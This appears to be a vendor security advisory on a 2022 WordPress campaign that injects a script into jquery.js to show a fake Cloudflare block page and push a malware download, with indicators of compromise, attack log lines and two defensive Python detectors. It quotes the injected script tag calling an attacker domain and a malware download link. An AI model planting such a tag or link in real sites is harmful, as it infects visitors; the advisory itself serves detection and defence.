On Sep 15, we detected a malicious campaign. The attackers were using phishing techniques to trick users into downloading a malicious binary file: a fake message displayed on compromised websites claimed that the user had been blocked by Cloudflare. The infected websites showing this message did not necessarily use Cloudflare services at all.
Once the user clicked the "Check the system" button in this fake popup, a malicious binary (sha256: fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9) was downloaded to their computer. The download link we uncovered was:
https://gitlab[.]com/devang-acespritech/openck/-/raw/main/CloudSt.zip
The downloaded archive is only 10 MB, but the unpacked binary is about 700 MB. The attackers evidently inflated the binary on purpose so that it stays under the radar: a file of that size will not be uploaded to many online virus scanning services.
In all the cases of infection, we found an identical injection in the following website files:
./wp-includes/js/jquery/jquery.js
./wp-includes/js/jquery/jquery.min.js
Unfortunately, the injection is heavily obfuscated, but it can be found by searching for the following pattern:
When executed, this code injects another malicious script tag into the page source:
<script src="https://gloogletag[.]com/tagged/ajax.js">
The script loaded above then fetches the HTML of the fake Cloudflare form from the following URL:
https://gloogletag[.]com/code/cloudflare.txt
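The injected tag is a third-party script source that the site owner never configured, so a practical way to catch this class of injection is to compare the script hosts a page actually serves against an allowlist. The following is an added example, not Imunify's code or a tool the post describes; the sample HTML is constructed for the example (it contains the injected tag from the post, with the "[.]" defanging undone so the URL parses), and the allowlist host is an assumption standing in for whatever a given site legitimately loads.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not captured from a real site): a same-origin WordPress
# script, the injected tag quoted in the post, and a legitimate third-party tag
# for contrast.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://gloogletag.com/tagged/ajax.js"></script>
<script src="https://www.googletagmanager.com/gtag/js?id=GA-EXAMPLE"></script>
</head><body><p>Hello</p></body></html>"""

# Assumption for the example: the hosts this site's operator has approved for scripts.
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def external_script_hosts(html):
    """Return the hostnames of all third-party script sources, in page order."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    hosts = []
    for src in collector.srcs:
        # Same-origin paths such as /wp-includes/... have no host and are skipped;
        # absolute and protocol-relative (//host/...) URLs do have one.
        host = urlparse(src).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def unexpected_script_hosts(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Hosts serving scripts that are not on the allowlist, deduplicated and sorted."""
    return sorted({h for h in external_script_hosts(html) if h not in allowed})


if __name__ == "__main__":
    for host in unexpected_script_hosts(SAMPLE_HTML):
        print(f"ALERT: unexpected external script host: {host}")
```

Run this against the HTML the web server actually returns (for example from a scheduled fetch of the home page) rather than against the files on disk: the injection in jquery.js is obfuscated, but the tag it writes into the page is not, so the rendered output is where the look-alike host shows up.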
Upon discovering this infection, we started an investigation. After examining the web server logs, we found that the attackers used the very same method in every registered case.
For this attack to start, the attacker needs access to a compromised WordPress administrator account. After a successful login, the attacker installs the wp-file-manager plugin. The web server logs show this sequence:
35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
In all of the cases we registered, the attack was carried out from the same IP address: 35.184.195.84.
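The three log lines above form a short, ordered chain (administrator login, plugin search for "file manager", use of the wp_file_manager page), which is a better detection signal than any single request. As an added example that is not Imunify's code or tooling, the following Python script parses access-log lines in the combined format shown above and raises one alert per client IP that completes the whole chain within a time window. The input is constructed from the three lines quoted in the post; the 15-minute window and the exact stage predicates are assumptions that a site operator would tune.

```python
import re
from collections import defaultdict
from datetime import datetime

# Input constructed from the three access-log lines quoted in the post.
SAMPLE_LOG = """
35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
""".strip().splitlines()

# Indicator from the post: the source address seen in every registered case.
KNOWN_BAD_IPS = {"35.184.195.84"}

# Combined log format: client, identity, user, [timestamp], "request", status, size, "referer", "user agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


# The stages of the chain, in order, as predicates on one parsed entry (assumed shapes).
STAGES = [
    ("admin_login", lambda e: e["method"] == "POST"
        and e["path"].startswith("/wp-login.php") and e["status"] == "302"),
    ("file_manager_search", lambda e: e["path"].startswith("/wp-admin/admin-ajax.php")
        and "plugin-install.php" in e["referer"]
        and "file+manager" in e["referer"].lower()),
    ("file_manager_use", lambda e: e["path"].startswith("/wp-admin/admin-ajax.php")
        and "page=wp_file_manager" in e["referer"]),
]


def find_chains(lines, window_seconds=900):
    """Return one alert per client IP that completes all STAGES in order within the window."""
    by_ip = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry:
            by_ip[entry["ip"]].append(entry)

    alerts = []
    for ip, entries in by_ip.items():
        entries.sort(key=lambda e: e["ts"])
        stage, started = 0, None
        for e in entries:
            if started and (e["ts"] - started).total_seconds() > window_seconds:
                stage, started = 0, None  # chain went stale: start over from the login stage
            if STAGES[stage][1](e):
                started = started or e["ts"]
                stage += 1
                if stage == len(STAGES):
                    alerts.append({"ip": ip, "start": started, "end": e["ts"],
                                   "known_bad_ip": ip in KNOWN_BAD_IPS})
                    stage, started = 0, None
    return alerts


if __name__ == "__main__":
    for alert in find_chains(SAMPLE_LOG):
        print(f"ALERT {alert['ip']}: admin login -> file manager install -> file manager use "
              f"between {alert['start']:%H:%M:%S} and {alert['end']:%H:%M:%S} "
              f"(known bad IP: {alert['known_bad_ip']})")
```

Matching on the chain rather than on the IP alone matters because the address will change between campaigns while the sequence of actions (login, plugin install, file manager use) is what the attack actually needs; the IP check is kept as a cheap extra signal for this particular campaign.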
gloogletag[.]com
35.184.195.84
fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9
Please consider following these steps:
The Imunify team cares about your infrastructure security. We always strive to keep you up to date with all the information necessary to protect your website and make sure that your business runs smoothly at all times. Please don't hesitate to direct any questions you have about protecting your website from malicious activity to our Imunify360 support team.